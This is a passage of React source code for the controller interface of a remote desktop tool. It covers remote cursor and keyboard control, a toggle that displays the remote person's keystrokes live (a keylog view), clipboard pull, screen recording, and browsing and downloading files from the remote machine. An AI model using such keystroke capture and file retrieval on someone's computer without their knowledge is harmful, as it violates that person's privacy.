          <div style={{ position: 'fixed', left: agentCursorPos.x, top: agentCursorPos.y, pointerEvents: 'none', zIndex: 9997, transform: 'translate(-2px, -2px)' }}>
            <svg width="20" height="20" viewBox="0 0 20 20" fill="none">
              <path d="M4 2L16 10L10 11L8 18L4 2Z" fill="#ff4444" stroke="#fff" strokeWidth="1.2"/>
            </svg>
            <div style={{ position: 'absolute', top: 18, left: 8, background: '#ff4444', color: '#fff', fontSize: 9, padding: '1px 4px', borderRadius: 3, whiteSpace: 'nowrap' }}>user</div>
          </div>
        )}
        {cursorVisible && !agentOffline && (
          <div style={{ position: 'fixed', left: cursorPos.x, top: cursorPos.y, pointerEvents: 'none', zIndex: 9998, transform: 'translate(-2px, -2px)' }}>
            {cursorType === 'text' ? (
              <svg width="14" height="20" viewBox="0 0 14 20" fill="none">
                <line x1="7" y1="0" x2="7" y2="20" stroke="white" strokeWidth="1.5"/>
                <line x1="3" y1="0" x2="11" y2="0" stroke="white" strokeWidth="1.5"/>
                <line x1="3" y1="20" x2="11" y2="20" stroke="white" strokeWidth="1.5"/>
              </svg>
            ) : (
              <svg width="20" height="20" viewBox="0 0 20 20" fill="none">
                <path d="M4 2L16 10L10 11L8 18L4 2Z" fill="white" stroke="#222" strokeWidth="1.2"/>
              </svg>
            )}
          </div>
        )}
        {lastKey && <div style={styles.keyIndicator} className="bl-fade"><span style={styles.keyBadge}>{lastKey}</span></div>}

        {/* [BL-EDIT] On-screen scroll pad. Press or hold to scroll the remote
            page up/down/left/right. Works even when the trackpad won't. */}
        {!agentOffline && mouseEnabled && (
          <div className="bl-scrollpad" style={styles.scrollPad} onClick={(e) => e.stopPropagation()}>
            {[
              { k: 'up', label: '▲', dx: 0, dy: 3, col: 2, row: 1 },
              { k: 'left', label: '◀', dx: 3, dy: 0, col: 1, row: 2 },
              { k: 'right', label: '▶', dx: -3, dy: 0, col: 3, row: 2 },
              { k: 'down', label: '▼', dx: 0, dy: -3, col: 2, row: 3 },
            ].map(b => (
              <button key={b.k} style={{ ...styles.scrollPadBtn, gridColumn: b.col, gridRow: b.row }}
                title={`Scroll ${b.k}`}
                onMouseDown={(e) => { e.preventDefault(); e.stopPropagation(); startScroll(b.dx, b.dy); }}
                onMouseUp={stopScroll} onMouseLeave={stopScroll}
                onTouchStart={(e) => { e.preventDefault(); startScroll(b.dx, b.dy); }}
                onTouchEnd={stopScroll}>{b.label}</button>
            ))}
          </div>
        )}

        {/* [BL-EDIT] Reset the pinch-zoom (shows only when zoomed in). */}
        {zoom > 1 && (
          <button onClick={() => { setZoom(1); setPan({ x: 0, y: 0 }); }}
            style={{ position: 'absolute', top: 10, left: 10, zIndex: 45, background: 'rgba(20,26,38,0.9)', color: '#dfe7f5', border: '1px solid #2a3346', borderRadius: 8, padding: '6px 10px', fontSize: 12, cursor: 'pointer' }}>
            ⤢ Reset zoom ({zoom.toFixed(1)}x)
          </button>
        )}

        {/* [BL-EDIT] Mobile keyboard: the button (mobile only) focuses a hidden
            input to pop the phone keyboard; typed characters are sent live to
            the remote machine's focused field. */}
        <button className="bl-mobile-only" onClick={() => { const el = mobileKbdRef.current; if (el) { el.value = ''; el.focus(); } }}
          style={{ position: 'absolute', bottom: 90, left: 16, zIndex: 45, background: '#155e75', color: '#fff', border: 'none', borderRadius: 10, padding: '10px 14px', fontSize: 14, cursor: 'pointer', boxShadow: '0 2px 10px rgba(0,0,0,.4)' }}>
          ⌨ Keyboard
        </button>
        <input ref={mobileKbdRef} aria-hidden="true" autoCapitalize="off" autoCorrect="off" autoComplete="off" spellCheck={false}
          onInput={(e) => { const d = e.nativeEvent && e.nativeEvent.data; if (d) sendCommand({ type: 'type_text', text: d }); e.target.value = ''; }}
          onKeyDown={(e) => {
            if (e.key === 'Backspace') { e.preventDefault(); sendCommand({ type: 'key_press', key: 'Backspace' }); }
            else if (e.key === 'Enter') { e.preventDefault(); sendCommand({ type: 'key_press', key: 'Enter' }); }
            else if (e.key === 'Tab') { e.preventDefault(); sendCommand({ type: 'key_press', key: 'Tab' }); }
          }}
          style={{ position: 'absolute', left: -9999, top: 0, width: 1, height: 1, opacity: 0 }} />
      </div>

      {keylogOn && keylogText && (
        <div style={{ position: 'fixed', bottom: 70, left: '50%', transform: 'translateX(-50%)', zIndex: 9995, background: 'rgba(10,10,20,0.92)', border: '1px solid #ffaa0044', borderRadius: 10, padding: '8px 16px', maxWidth: 560, backdropFilter: 'blur(4px)' }} className="bl-fade">
          <div style={{ color: '#ffaa00', fontSize: 10, letterSpacing: 1, marginBottom: 4 }}>⌨️ USER TYPING</div>
          <div style={{ color: '#fff', fontSize: 13, fontFamily: 'monospace', whiteSpace: 'pre-wrap', wordBreak: 'break-word', lineHeight: 1.5, maxHeight: 90, overflow: 'auto' }}>
            {keylogText}<span style={{ opacity: 0.6 }}>▏</span>
          </div>
        </div>
      )}
      {/* [BL-EDIT] Toast notifications — stacked, auto-dismissing, top-center. */}
      {toasts.length > 0 && (
        <div style={{ position: 'fixed', top: 16, left: '50%', transform: 'translateX(-50%)', zIndex: 10001,
                      display: 'flex', flexDirection: 'column', gap: 8, alignItems: 'center', pointerEvents: 'none', width: 'max-content', maxWidth: '92vw' }}>
          {toasts.map(t => (
            <div key={t.id} onClick={() => dismissToast(t.id)} className="bl-fade"
              style={{ pointerEvents: 'auto', cursor: 'pointer', display: 'flex', alignItems: 'center', gap: 10,
                       background: t.type === 'error' ? 'rgba(40,12,12,0.96)' : t.type === 'success' ? 'rgba(10,32,18,0.96)' : 'rgba(16,18,30,0.96)',
                       border: '1px solid ' + (t.type === 'error' ? '#ff444455' : t.type === 'success' ? '#4cff9155' : '#7c6aff44'),
                       color: t.type === 'error' ? '#ffd7d7' : t.type === 'success' ? '#c7ffe0' : '#e6e9ff',
                       borderRadius: 10, padding: '10px 16px', fontSize: 13, fontWeight: 500,
                       boxShadow: '0 8px 28px rgba(0,0,0,0.5)', backdropFilter: 'blur(6px)', maxWidth: '92vw' }}>
              <span style={{ fontSize: 15 }}>{t.type === 'error' ? '⚠️' : t.type === 'success' ? '✅' : 'ℹ️'}</span>
              <span style={{ whiteSpace: 'pre-wrap' }}>{t.text.replace(/^([✅❌🖼⏺⏳🔴ℹ️⚠️]\s*)/, '')}</span>
            </div>
          ))}
        </div>
      )}

      {/* [BL-EDIT] Recordings panel — this session's saved recordings, styled to
          match the other panels. Auto-save still happens; this is for review / re-save. */}
      {showRecordings && (
        <div className="bl-panel" style={{ position: 'fixed', top: 70, right: 20, width: 360, maxHeight: '70vh', overflowY: 'auto', zIndex: 9996,
                      background: '#0f1626', border: '1px solid #263043', borderRadius: 12, padding: 14, color: '#dfe7f5', boxShadow: '0 8px 24px rgba(0,0,0,.5)' }}>
          <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', marginBottom: 10 }}>
            <div style={{ fontWeight: 600, fontSize: 14 }}>🎬 Session recordings</div>
            <button className="bl-icon-btn" onClick={() => setShowRecordings(false)} title="Close"
              style={{ background: '#1a2233', color: '#8a97a8', border: '1px solid #263043', borderRadius: 6, padding: '2px 8px', cursor: 'pointer' }}>✕</button>
          </div>
          {recordings.length === 0 ? (
            <div style={{ color: '#8a97a8', fontSize: 12, textAlign: 'center', padding: '20px 8px' }}>
              No recordings yet. Press ⏺ Record to capture the screen — it saves automatically and shows up here.
            </div>
          ) : recordings.map(r => (
            <div key={r.id} style={{ display: 'flex', alignItems: 'center', gap: 10, padding: '10px 0', borderBottom: '1px solid #1c2536' }}>
              <span style={{ fontSize: 20 }}>🎞</span>
              <div style={{ flex: 1, minWidth: 0 }}>
                <div style={{ fontSize: 12, fontWeight: 600, whiteSpace: 'nowrap', overflow: 'hidden', textOverflow: 'ellipsis' }}>{r.name}</div>
                <div style={{ fontSize: 11, color: '#8a97a8' }}>
                  {new Date(r.at).toLocaleTimeString()} · {(r.size / 1048576).toFixed(1)} MB
                </div>
              </div>
              <a href={r.url} download={r.name} title="Save again"
                 style={{ background: '#155e75', color: '#fff', borderRadius: 6, padding: '5px 10px', fontSize: 12, textDecoration: 'none' }}>⬇ Save</a>
              <button onClick={() => setRecordings(prev => prev.filter(x => x.id !== r.id))} title="Remove from list"
                 style={{ background: '#7f1d1d', color: '#fff', border: 'none', borderRadius: 6, padding: '5px 8px', fontSize: 12, cursor: 'pointer' }}>🗑</button>
            </div>
          ))}
          {recordings.length > 0 && (
            <div style={{ fontSize: 10, color: '#5a6678', marginTop: 8 }}>Recordings clear when you leave this session. Use ⬇ Save to keep a copy.</div>
          )}
        </div>
      )}

      {/* [BL-EDIT] Minimized: just a small tab to bring the toolbar back — draggable. */}
      {toolbarMin && (
        <div style={{ position: 'fixed', ...(barPos ? { left: barPos.x, top: barPos.y, bottom: 'auto', transform: 'translate(-50%, -50%)' } : { bottom: 12, left: '50%', transform: 'translateX(-50%)' }), zIndex: 9995, display: 'flex', alignItems: 'stretch', boxShadow: '0 6px 24px rgba(0,0,0,0.45)' }}>
          <span onMouseDown={beginBarDrag} onTouchStart={beginBarDrag} title="Drag to move"
            style={{ display: 'flex', alignItems: 'center', padding: '5px 9px', cursor: 'grab', color: '#5a7a8a',
                     background: 'rgba(8,14,22,0.96)', border: '1px solid rgba(0,229,255,0.2)', borderRight: 'none', borderTopLeftRadius: 10, borderBottomLeftRadius: 10 }}>⠿</span>
          <button onClick={() => setToolbarMin(false)} title="Show tools"
            style={{ background: 'rgba(8,14,22,0.96)', color: '#00e5ff', border: '1px solid rgba(0,229,255,0.2)', borderLeft: 'none', borderTopRightRadius: 10, borderBottomRightRadius: 10,
                     padding: '5px 16px', fontSize: 11, fontWeight: 600, cursor: 'pointer', letterSpacing: 0.4 }}>▲ Tools</button>
        </div>
      )}
      {!toolbarMin && (
      <div className="bl-bottombar" style={{ ...styles.bottomToolbar, ...barPosStyle }}>
        {/* [BL-EDIT] Drag handle — move the whole toolbar out of the way. */}
        <span onMouseDown={beginBarDrag} onTouchStart={beginBarDrag} title="Drag to move the toolbar"
          style={{ display: 'flex', alignItems: 'center', padding: '0 6px', cursor: 'grab', color: '#5a6678', fontSize: 16 }}>⠿</span>
        {/* [BL-EDIT] Minimize the toolbar so it stops blocking the screen. */}
        <button className="bl-icon-btn" style={{ ...styles.toolbarBtn, background: 'rgba(0,229,255,0.06)', borderColor: 'rgba(0,229,255,0.22)', color: '#00e5ff' }}
          title="Hide the toolbar"
          onClick={() => { setToolbarMin(true); setShowChat(false); setShowFilePanel(false); setShowTypeBox(false); setShowMigrate(false); }}>▼ Hide</button>
        <button className="bl-icon-btn" style={{ ...styles.toolbarBtn, background: showChat ? 'rgba(0,255,157,0.1)' : 'rgba(8,14,22,0.85)', borderColor: showChat ? 'rgba(0,255,157,0.4)' : 'rgba(0,229,255,0.14)', color: showChat ? '#00ff9d' : '#8aa0b0' }} onClick={() => { setShowChat(!showChat); setShowFilePanel(false); setShowMigrate(false); }}>💬 Chat</button>
        <button className="bl-icon-btn" style={{ ...styles.toolbarBtn, background: showFilePanel ? 'rgba(0,255,157,0.1)' : 'rgba(8,14,22,0.85)', borderColor: showFilePanel ? 'rgba(0,255,157,0.4)' : 'rgba(0,229,255,0.14)', color: showFilePanel ? '#00ff9d' : '#8aa0b0' }} onClick={() => { setShowFilePanel(!showFilePanel); setShowChat(false); setShowMigrate(false); }}>📁 Files</button>
        {/* [BL-EDIT] Type-text box */}
        <button className="bl-icon-btn" style={{ ...styles.toolbarBtn, background: showTypeBox ? 'rgba(0,255,157,0.1)' : 'rgba(8,14,22,0.85)', borderColor: showTypeBox ? 'rgba(0,255,157,0.4)' : 'rgba(0,229,255,0.14)', color: showTypeBox ? '#00ff9d' : '#8aa0b0' }} onClick={() => { setShowTypeBox(!showTypeBox); setShowChat(false); setShowFilePanel(false); setShowMigrate(false); }}>⌨ Type</button>
        {showTypeBox && (
          <div className="bl-panel" style={{ position: 'absolute', bottom: 54, left: 8, width: 340, background: '#0f0f18', border: '1px solid #1e1e2e', borderRadius: 12, padding: 12, zIndex: 9996, boxShadow: '0 8px 24px rgba(0,0,0,0.5)' }}>
            <div style={{ color: '#dfe7f5', fontWeight: 600, fontSize: 13, marginBottom: 4 }}>⌨ Type text on the remote machine</div>
            <div style={{ color: '#8a97a8', fontSize: 11, marginBottom: 8 }}>Click the target field on the remote screen first, then Send — the text types into whatever is focused there, and the person sees it.</div>
            <textarea value={typeText} onChange={(e) => setTypeText(e.target.value)} placeholder="Type or paste text here…"
              style={{ width: '100%', height: 70, background: '#0a0a14', color: '#dfe7f5', border: '1px solid #26303f', borderRadius: 8, padding: 8, fontSize: 13, fontFamily: 'inherit', resize: 'vertical' }} />
            <label style={{ display: 'flex', alignItems: 'center', gap: 6, color: '#8a97a8', fontSize: 12, margin: '8px 0' }}>
              <input type="checkbox" checked={typeEnter} onChange={(e) => setTypeEnter(e.target.checked)} /> Press Enter after (submit)
            </label>
            <div style={{ display: 'flex', gap: 8 }}>
              <button className="bl-btn" style={{ ...styles.btn, flex: 1 }} onClick={sendTypeText} disabled={!typeText}>Send</button>
              <button className="bl-btn" style={{ ...styles.btn, background: '#2a2a3a' }} onClick={() => setTypeText('')}>Clear</button>
            </div>
          </div>
        )}
        <button className="bl-icon-btn"
          style={{ ...styles.toolbarBtn, background: keylogOn ? 'rgba(255,176,32,0.1)' : 'rgba(8,14,22,0.85)', borderColor: keylogOn ? 'rgba(255,176,32,0.4)' : 'rgba(0,229,255,0.14)', color: keylogOn ? '#ffb020' : '#5a6a7a' }}
          title="Show what the person at the machine is typing"
          onClick={() => { const next = !keylogOn; setKeylogOn(next); keylogOnRef.current = next; if (!next) setKeylogText(''); }}>
          ⌨️ Typing {keylogOn ? 'ON' : 'OFF'}
        </button>
      </div>
      )}

      {showChat && (
        <div style={styles.chatBox} className="bl-fade">
          <div style={styles.panelLabel}>MESSAGE TO AGENT</div>
          <div style={styles.chatInputRow}>
            <input style={styles.chatInput} type="text" placeholder="Type a message..." value={chatMsg} onChange={e => setChatMsg(e.target.value)} onKeyDown={e => { e.stopPropagation(); if (e.key === 'Enter') sendChat(); }} />
            <button className="bl-btn" style={styles.chatSendBtn} onClick={sendChat}>Send</button>
          </div>
          {chatSent && <div style={{ color: '#4cff91', fontSize: 11 }} className="bl-fade">{chatSent}</div>}
          <div style={{ height: 1, background: '#1a1a2a', margin: '2px 0' }} />
          <div style={styles.panelLabel}>CLIPBOARD</div>
          <div style={{ display: 'flex', gap: 6 }}>
            <button className="bl-icon-btn" style={styles.clipBtn} onClick={pushClipboard}>⬆ Push mine</button>
            <button className="bl-icon-btn" style={styles.clipBtn} onClick={pullClipboard}>⬇ Get agent's</button>
          </div>
          {clipboardStatus && <div style={{ color: clipboardStatus.startsWith('✅') ? '#4cff91' : '#ff4444', fontSize: 11 }} className="bl-fade">{clipboardStatus}</div>}
        </div>
      )}

      <div style={styles.filePanel}>
        {showFilePanel && (
          <div style={{ ...styles.filePanelContent, ...(fileExpanded ? { width: 'min(820px, 94vw)', maxWidth: 'none', maxHeight: '84vh', overflowY: 'auto', resize: 'both' } : {}) }} className="bl-fade bl-panel">
            {/* [BL-EDIT] Expand / shrink the file panel to use the Controller screen. */}
            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', marginBottom: 2 }}>
              <div style={styles.panelLabel}>FILE MANAGER</div>
              <button className="bl-icon-btn" title={fileExpanded ? 'Shrink panel' : 'Expand panel'} onClick={() => setFileExpanded(v => !v)}
                style={{ background: '#1a1a2a', border: '1px solid #2a2a3a', color: '#7c6aff', borderRadius: 6, padding: '2px 8px', fontSize: 12, cursor: 'pointer' }}>
                {fileExpanded ? '⤡ Shrink' : '⛶ Expand'}
              </button>
            </div>
            <div style={styles.panelLabel}>SEND TO AGENT</div>
            {/* [BL-EDIT] Choose where sent files land on the remote machine. */}
            <div style={{ display: 'flex', gap: 6, alignItems: 'center', marginBottom: 6 }}>
              <span style={{ color: '#8a97a8', fontSize: 11 }}>Save to:</span>
              <select value={sendDest} onChange={(e) => setSendDest(e.target.value)}
                style={{ flex: 1, background: '#0a0a14', color: '#dfe7f5', border: '1px solid #26303f', borderRadius: 6, padding: '5px 7px', fontSize: 12 }}>
                <option value="desktop">Desktop</option>
                <option value="documents">Documents</option>
                <option value="downloads">Downloads</option>
                <option value="custom">Custom folder…</option>
              </select>
            </div>
            {sendDest === 'custom' && (
              <input value={sendDestPath} onChange={(e) => setSendDestPath(e.target.value)} placeholder="e.g. C:\\Users\\You\\Projects"
                style={{ width: '100%', marginBottom: 6, background: '#0a0a14', color: '#dfe7f5', border: '1px solid #26303f', borderRadius: 6, padding: '6px 8px', fontSize: 12 }} />
            )}
            <div style={{ ...styles.dropZone, borderColor: dragOver ? '#7c6aff' : '#2a2a3a', background: dragOver ? '#13131f' : '#0a0a14' }} onDragOver={handleDragOver} onDragLeave={handleDragLeave} onDrop={handleDrop} onClick={() => document.getElementById('bl-file-input').click()}>
              <span style={{ fontSize: 24, opacity: 0.6 }}>📂</span>
              <span style={{ color: '#444', fontSize: 12 }}>Drag &amp; drop, or click to pick one or many files</span>
              <input id="bl-file-input" type="file" multiple style={{ display: 'none' }} onChange={handleFilePick} />
            </div>
            <button className="bl-icon-btn" style={{ ...styles.fileBtn, marginTop: 6 }}
              onClick={() => document.getElementById('bl-folder-input').click()}>📁 Send a whole folder</button>
            <input id="bl-folder-input" type="file" webkitdirectory="" directory="" multiple style={{ display: 'none' }} onChange={handleFolderPick} />
            <div style={{ height: 1, background: '#1a1a2a', margin: '4px 0' }} />
            <div style={styles.panelLabel}>GET FROM AGENT</div>
            {!browsing ? (
              <button className="bl-icon-btn" style={styles.fileBtn} onClick={openBrowser}>📂 Browse Files</button>
            ) : (
              <div style={styles.fileBrowser}>
                <div style={styles.fileBrowserBar}>
                  <button className="bl-icon-btn" style={styles.fileBrowserBackBtn} onClick={() => browseParent ? browseDir(browseParent) : null} disabled={!browseParent}>← Up</button>
                  <span style={styles.fileBrowserPath}>{browsePath}</span>
                  {selFiles.length > 0 && (
                    <button className="bl-btn" style={{ ...styles.fileBrowserDl, background: '#7c3aed', color: '#fff', marginRight: 6 }}
                      onClick={downloadSelected}>⬇ selected ({selFiles.length})</button>
                  )}
                  <button style={styles.fileBrowserCloseBtn} onClick={() => setBrowsing(false)}>✕</button>
                </div>
                {browseLoading && <div style={styles.fileBrowserLoading}><span className="bl-spin">⟳</span> Loading...</div>}
                {browseError && <div style={styles.fileBrowserError}>❌ {browseError}</div>}
                {!browseLoading && !browseError && (
                  <div style={{ ...styles.fileBrowserList, ...(fileExpanded ? { maxHeight: '58vh' } : {}) }}>
                    {browseEntries.length === 0 && <div style={styles.fileBrowserEmpty}>Empty folder</div>}
                    {browseEntries.map((entry, i) => (
                      <div key={i} className="bl-file-entry" style={{ ...styles.fileBrowserEntry, cursor: entry.type === 'folder' ? 'pointer' : 'default' }} onClick={() => entry.type === 'folder' ? browseDir(entry.path) : null}>
                        <input type="checkbox" checked={selFiles.includes(entry.path)} onClick={(e) => e.stopPropagation()} onChange={() => toggleSel(entry.path)} style={{ marginRight: 6, cursor: 'pointer' }} title="Select to download together" />
                        <span style={styles.fileBrowserIcon}>{fileIcon(entry)}</span>
                        <span style={styles.fileBrowserName}>{entry.name}</span>
                        {entry.type === 'file' && (<><span style={styles.fileBrowserSize}>{entry.sizeStr}</span><button className="bl-btn" style={styles.fileBrowserDl} onClick={(e) => { e.stopPropagation(); downloadFile(entry.path, entry.name); }}>⬇</button></>)}
                        {entry.type === 'folder' && (<><button className="bl-btn" style={styles.fileBrowserDl} title="Download this folder as a .zip" onClick={(e) => { e.stopPropagation(); downloadFile(entry.path, entry.name + '.zip'); }}>⬇ zip</button><span style={styles.fileBrowserArrow}>›</span></>)}
                      </div>
                    ))}
                  </div>
                )}
              </div>
            )}
            {fileTransferStatus && <div style={{ ...styles.fileStatus, color: fileTransferDone ? (fileTransferStatus.startsWith('✅') ? '#4cff91' : '#ff4444') : '#ffaa00' }} className="bl-fade">{fileTransferStatus}</div>}
          </div>
        )}
      </div>
    </div>
    
  );
}

const styles = {
  container: {
    minHeight: '100vh',
    background: 'radial-gradient(ellipse 120% 80% at 50% -20%, #0a1a28 0%, #05080c 45%, #030507 100%)',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    fontFamily: "'Inter', 'SF Pro Display', system-ui, sans-serif",
  },
  loginBox: {
    background: 'linear-gradient(165deg, rgba(12,20,30,0.95) 0%, rgba(8,12,18,0.98) 100%)',
    border: '1px solid rgba(0,229,255,0.18)',
    borderRadius: 20,
    padding: 44,
    width: 380,
    display: 'flex',
    flexDirection: 'column',
    gap: 20,
    boxShadow: '0 24px 64px rgba(0,0,0,0.55), 0 0 0 1px rgba(0,229,255,0.06), inset 0 1px 0 rgba(255,255,255,0.04)',
    backdropFilter: 'blur(12px)',
  },
  logo: {
    color: '#00e5ff',
    margin: 0,
    fontSize: 26,
    letterSpacing: 4,
    fontWeight: 600,
    fontFamily: "'JetBrains Mono', monospace",
    textShadow: '0 0 24px rgba(0,229,255,0.35)',
  },
  sub: { color: '#5a6a7a', margin: 0, fontSize: 13, letterSpacing: 0.3 },
  errorBox: {
    background: 'rgba(40,8,12,0.85)',
    border: '1px solid rgba(255,59,92,0.35)',
    borderRadius: 10,
    padding: '11px 14px',
    color: '#ff6b82',
    fontSize: 13,
    display: 'flex',
    alignItems: 'center',
    gap: 8,
  },
  input: {
    background: 'rgba(6,10,16,0.9)',
    border: '1px solid rgba(0,229,255,0.12)',
    borderRadius: 10,
    padding: '13px 16px',
    color: '#e8f4f8',
    fontSize: 14,
    outline: 'none',
    fontFamily: 'inherit',
    width: '100%',
  },
  btn: {
    background: 'linear-gradient(135deg, #00d4e8 0%, #00a8c4 55%, #0088a0 100%)',
    border: '1px solid rgba(0,229,255,0.35)',
    borderRadius: 9,
    padding: '12px 16px',
    color: '#031018',
    fontSize: 13,
    cursor: 'pointer',
    fontWeight: 600,
    fontFamily: 'inherit',
    boxShadow: '0 2px 12px rgba(0,229,255,0.22), inset 0 1px 0 rgba(255,255,255,0.15)',
  },
  dashboard: { width: 600, fontFamily: 'inherit', padding: '0 12px' },
  refreshBtn: {
    background: 'rgba(8,14,22,0.95)',
    border: '1px solid rgba(0,229,255,0.22)',
    borderRadius: 9,
    width: 36,
    height: 36,
    color: '#00e5ff',
    cursor: 'pointer',
    fontSize: 16,
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    boxShadow: 'inset 0 1px 0 rgba(255,255,255,0.04)',
  },
  agentList: { display: 'flex', flexDirection: 'column', gap: 12 },
  agentCard: {
    background: 'linear-gradient(145deg, rgba(12,18,26,0.95), rgba(8,12,18,0.98))',
    border: '1px solid rgba(0,229,255,0.1)',
    borderRadius: 14,
    padding: '18px 22px',
    display: 'flex',
    justifyContent: 'space-between',
    alignItems: 'center',
    cursor: 'pointer',
    boxShadow: '0 4px 20px rgba(0,0,0,0.25)',
  },
  agentInfo: { display: 'flex', alignItems: 'center', gap: 14, flex: 1 },
  agentDotWrap: { width: 10, flexShrink: 0 },
  dot: { color: '#00ff9d', fontSize: 9, textShadow: '0 0 8px rgba(0,255,157,0.6)' },
  agentName: { color: '#e8f4f8', fontSize: 15, fontWeight: 600 },
  agentOs: {
    color: '#6a7a8a',
    fontSize: 11,
    background: 'rgba(0,229,255,0.06)',
    padding: '3px 9px',
    borderRadius: 6,
    border: '1px solid rgba(0,229,255,0.08)',
  },
  connectArrow: { display: 'flex', alignItems: 'center', gap: 4, flexShrink: 0, paddingLeft: 8 },
  emptyState: { display: 'flex', flexDirection: 'column', alignItems: 'center', padding: '60px 0', textAlign: 'center' },
  controlContainer: {
    height: '100dvh',
    maxHeight: '100dvh',
    background: '#030507',
    display: 'flex',
    flexDirection: 'column',
    outline: 'none',
    fontFamily: 'inherit',
    overflow: 'hidden',
  },
  controlBar: {
    background: 'linear-gradient(180deg, rgba(8,14,22,0.98) 0%, rgba(6,10,16,0.95) 100%)',
    padding: '11px 20px',
    display: 'flex',
    justifyContent: 'space-between',
    alignItems: 'center',
    borderBottom: '1px solid rgba(0,229,255,0.1)',
    flexWrap: 'wrap',
    gap: 8,
    boxShadow: '0 4px 24px rgba(0,0,0,0.4)',
  },
  controlBarCenter: { display: 'flex', alignItems: 'center', gap: 8, flexWrap: 'wrap' },
  controlBarRight: { display: 'flex', alignItems: 'center', gap: 6 },
  statusBadge: { fontSize: 11, padding: '4px 11px', borderRadius: 20, fontFamily: 'inherit', fontWeight: 500 },
  screenStatusBadge: { fontSize: 11, padding: '4px 11px', borderRadius: 20, fontFamily: 'inherit', fontWeight: 500 },
  timerBadge: {
    color: '#00e5ff',
    fontSize: 11,
    background: 'rgba(0,229,255,0.08)',
    padding: '4px 11px',
    borderRadius: 20,
    border: '1px solid rgba(0,229,255,0.2)',
    fontFamily: "'JetBrains Mono', monospace",
  },
  screenInfo: { color: '#4a5a6a', fontSize: 11 },
  fullscreenBtn: {
    background: 'rgba(8,14,22,0.92)',
    border: '1px solid rgba(0,229,255,0.14)',
    borderRadius: 8,
    padding: '5px 10px',
    color: '#8aa0b0',
    cursor: 'pointer',
    fontSize: 11,
    fontFamily: 'inherit',
    fontWeight: 500,
    boxShadow: 'inset 0 1px 0 rgba(255,255,255,0.03)',
  },
  privacyBtn: {
    borderRadius: 8,
    padding: '5px 11px',
    fontSize: 11,
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontWeight: 500,
  },
  backBtn: {
    background: 'rgba(20,6,10,0.6)',
    border: '1px solid rgba(255,59,92,0.28)',
    borderRadius: 8,
    padding: '5px 11px',
    color: '#ff6b82',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 11,
    fontWeight: 500,
  },
  monitorBtn: {
    background: 'rgba(8,14,22,0.92)',
    border: '1px solid rgba(0,229,255,0.14)',
    borderRadius: 8,
    padding: '5px 10px',
    color: '#8aa0b0',
    cursor: 'pointer',
    fontSize: 11,
    fontFamily: 'inherit',
    fontWeight: 500,
  },
  monitorDropdown: {
    position: 'absolute',
    top: '100%',
    right: 0,
    marginTop: 4,
    background: 'linear-gradient(165deg, #0c141e, #080c12)',
    border: '1px solid rgba(0,229,255,0.18)',
    borderRadius: 12,
    overflow: 'hidden',
    zIndex: 9999,
    minWidth: 210,
    boxShadow: '0 12px 32px rgba(0,0,0,0.5)',
  },
  monitorOption: { padding: '11px 16px', cursor: 'pointer', fontSize: 12, fontFamily: 'inherit' },
  alert: {
    background: 'rgba(40,8,12,0.9)',
    borderLeft: '3px solid #ff3b5c',
    color: '#ff8a9a',
    padding: '11px 20px',
    fontSize: 12,
    display: 'flex',
    justifyContent: 'space-between',
    alignItems: 'center',
  },
  alertClose: { background: 'transparent', border: 'none', color: '#ff3b5c', cursor: 'pointer', fontSize: 16 },
  videoWrapper: {
    flex: 1,
    position: 'relative',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    overflow: 'hidden',
    minHeight: 0,
    minWidth: 0,
    background: '#000',
    width: '100%',
  },
  video: {
    width: '100%',
    height: '100%',
    position: 'absolute',
    top: 0,
    left: 0,
    background: '#000',
    transition: 'opacity 0.4s',
    objectFit: 'contain',
  },
  keyIndicator: {
    position: 'fixed',
    bottom: 70,
    left: '50%',
    transform: 'translateX(-50%)',
    pointerEvents: 'none',
    zIndex: 9999,
  },
  keyBadge: {
    background: 'linear-gradient(135deg, rgba(0,229,255,0.92), rgba(0,180,200,0.9))',
    color: '#041018',
    padding: '9px 24px',
    borderRadius: 10,
    fontSize: 15,
    fontFamily: "'JetBrains Mono', monospace",
    fontWeight: 600,
    backdropFilter: 'blur(6px)',
    boxShadow: '0 4px 20px rgba(0,229,255,0.35)',
  },
  fallbackBadge: {
    background: 'rgba(40,28,0,0.8)',
    color: '#ffb020',
    fontSize: 10,
    padding: '3px 9px',
    borderRadius: 6,
    border: '1px solid rgba(255,176,32,0.3)',
  },
  captureBadge: {
    background: 'rgba(0,40,24,0.8)',
    color: '#00ff9d',
    fontSize: 10,
    padding: '3px 9px',
    borderRadius: 6,
    border: '1px solid rgba(0,255,157,0.3)',
  },
  monitorBadge: {
    background: 'rgba(0,30,40,0.8)',
    color: '#00e5ff',
    fontSize: 10,
    padding: '3px 9px',
    borderRadius: 6,
    border: '1px solid rgba(0,229,255,0.25)',
  },
  agentMeta: { color: '#4a5a6a', fontSize: 11, marginTop: 5 },
  offlineOverlay: {
    position: 'absolute',
    top: 0, left: 0, right: 0, bottom: 0,
    background: 'rgba(3,5,7,0.92)',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    zIndex: 9000,
    backdropFilter: 'blur(8px)',
  },
  offlineBox: {
    background: 'linear-gradient(165deg, #0c141e, #080c12)',
    border: '1px solid rgba(255,59,92,0.3)',
    borderRadius: 20,
    padding: 48,
    display: 'flex',
    flexDirection: 'column',
    alignItems: 'center',
    gap: 14,
    maxWidth: 380,
    textAlign: 'center',
    boxShadow: '0 24px 64px rgba(0,0,0,0.6)',
  },
  offlineTitle: { color: '#ff6b82', fontSize: 20, fontWeight: 600 },
  offlineSub: { color: '#5a6a7a', fontSize: 13, lineHeight: 1.6 },
  offlineBackBtn: {
    background: 'transparent',
    border: '1px solid rgba(0,229,255,0.2)',
    borderRadius: 10,
    padding: '11px 24px',
    color: '#8aa0b0',
    cursor: 'pointer',
    fontFamily: 'inherit',
  },
  streamErrorBanner: {
    background: 'rgba(20,8,10,0.95)',
    borderLeft: '3px solid #ff3b5c',
    color: '#ff8a9a',
    padding: '11px 20px',
    fontSize: 12,
    display: 'flex',
    alignItems: 'center',
    gap: 10,
    fontFamily: 'inherit',
  },
  retryNowBtn: {
    background: 'rgba(40,8,12,0.9)',
    border: '1px solid rgba(255,59,92,0.4)',
    borderRadius: 8,
